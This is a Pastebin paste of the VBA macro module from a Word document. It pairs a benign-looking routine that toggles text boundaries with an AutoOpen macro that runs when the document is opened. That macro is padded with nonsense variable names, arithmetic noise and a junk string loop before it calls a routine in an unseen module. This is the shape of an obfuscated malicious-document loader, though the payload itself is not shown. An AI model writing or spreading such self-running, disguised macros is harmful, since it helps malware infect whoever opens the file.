Advertisement
Guest User

Untitled

a guest
Jan 24th, 2018
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Sub ToggleTextBoundaries()
  10.     If Documents.Count > 0 Then
  11.         With ActiveDocument.ActiveWindow.View
  12.             .ShowTextBoundaries = Not .ShowTextBoundaries
  13.         End With
  14.     End If
  15. End Sub
  16.  
  17. Public Sub AutoOpen()
  18.     Dim uncurbed As Integer
  19.     Dim remigration As Integer
  20.     Dim affuse As Variant
  21.     remigration = solemnize.permanent
  22.     If remigration = 48 - 97 + 39349 Then
  23.         ToggleTextBoundaries
  24.     Else
  25.         anatomist = 96 - 77
  26.         blarney = 49 + 6
  27.         For anatomist = 96 - 77 To 49 + 6
  28.             anthropolatry = Right("standpointuro", 3) + "pygiu" + Left("mmoping", 1) + Left("attroupement", 0)
  29.         Next anatomist
  30.         solemnize.wedgeshaped
  31.     End If
  32. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement